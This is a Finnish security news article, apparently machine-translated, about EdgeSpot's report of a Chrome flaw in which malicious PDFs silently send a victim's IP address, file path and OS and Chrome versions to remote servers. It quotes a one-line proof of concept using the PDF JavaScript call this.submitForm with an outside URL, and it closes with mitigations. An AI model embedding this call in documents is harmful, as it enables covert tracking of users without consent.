Hyödyntä ilmaisupalvelu EdgeSpot löysi kiehtovan Chromen nollapäivän haavoittuvuuden hyödyntäen PDF-dokumentteja. Haavoittuvuuden ansiosta hyökkääjät voivat kerätä arkaluontoisia tietoja käyttämällä Chromessa avattuja haitallisia PDF-dokumentteja.

Heti kun uhri avaa vastaavat PDF-tiedostot Google Chromessa, haittaohjelma alkaa toimia taustalla keräämällä käyttäjätietoja.

Tiedot välitetään sitten etäpalvelimelle, jota hakkerit hallitsevat. Saatat ihmetellä, mitä tietoja hyökkääjät imevät. He kohdistavat seuraavat tiedot tietokoneellesi:

• IP-osoite
• PDF-tiedoston koko polku järjestelmässä
• OS- ja Chrome-versiot

Varo haittaohjelmien sisältämiä PDF-tiedostoja

Saatat olla yllättynyt tietäessäsi, että mitään ei tapahdu, kun Adobe Readeria käytetään PDF-tiedostojen avaamiseen. Lisäksi HTTP POST -pyyntöjä käytetään tiedon siirtämiseen etäpalvelimille ilman käyttäjän toimia.

Asiantuntijat havaitsivat, että toinen kahdesta verkkotunnuksesta readnotifycom tai burpcollaboratornet sai tietoja.

Voit kuvitella hyökkäyksen voimakkuuden ottamalla huomioon tosiasian, että suurin osa virustorjuntaohjelmista ei pysty havaitsemaan EdgeSpotin havaitsemia näytteitä.

Asiantuntijat paljastavat, että hyökkääjät käyttävät “this.submitForm ()” PDF Javascript -sovellusliittymää kerätäkseen käyttäjien arkaluontoisia tietoja.

Testasimme sitä minimaalisella PoC: llä. Yksinkertainen sovellusliittymäkutsu, kuten “this.submitForm ('http://google.com/test')”, saa Google Chromen lähettämään henkilökohtaiset tiedot osoitteeseen google.com.

Asiantuntijat tosiasiallisesti selvisivät, että tätä Chrome-virhettä oli hyödynnetty kahdella erillisellä haitallisten PDF-tiedostojen ryhmällä. Molemmat jaettiin lokakuussa 2017 ja syyskuussa 2018.

Hyökkääjät voivat erityisesti käyttää kerättyjä tietoja hienosäätää hyökkäyksiä tulevaisuudessa. Raportit viittaavat siihen, että ensimmäinen tiedostoerä on koottu ReadNotifyn PDF-seurantapalvelun avulla.

Käyttäjät voivat käyttää palvelua seurataksesi käyttäjän näkymiä. EdgeSpot ei ole jakanut mitään tietoja toisen PDF-tiedostojoukon luonteesta.

Kuinka pysyä suojassa

Exploit-tunnistuspalvelu EdgeSpot halusi varoittaa käyttäjiä Chromen käyttäjiä mahdollisista riskeistä, koska korjaustiedoston ei odoteta julkaistuvan lähitulevaisuudessa.

EdgeSpot raportoi Googlelle haavoittuvuudesta viime vuonna ja yritys lupasi julkaista korjaustiedoston huhtikuun lopulla. H

Voit kuitenkin harkita väliaikaisen kiertotavan käyttämistä ongelmaan tarkastelemalla paikallisesti vastaanotettuja PDF-dokumentteja vaihtoehtoisella PDF-lukijasovelluksella.

Vaihtoehtoisesti voit avata PDF-dokumentit myös Chromessa irrottamalla järjestelmät Internetistä. Sillä välin voit odottaa Chrome 74 -päivitystä, jonka odotetaan julkaistavan 23. huhtikuuta.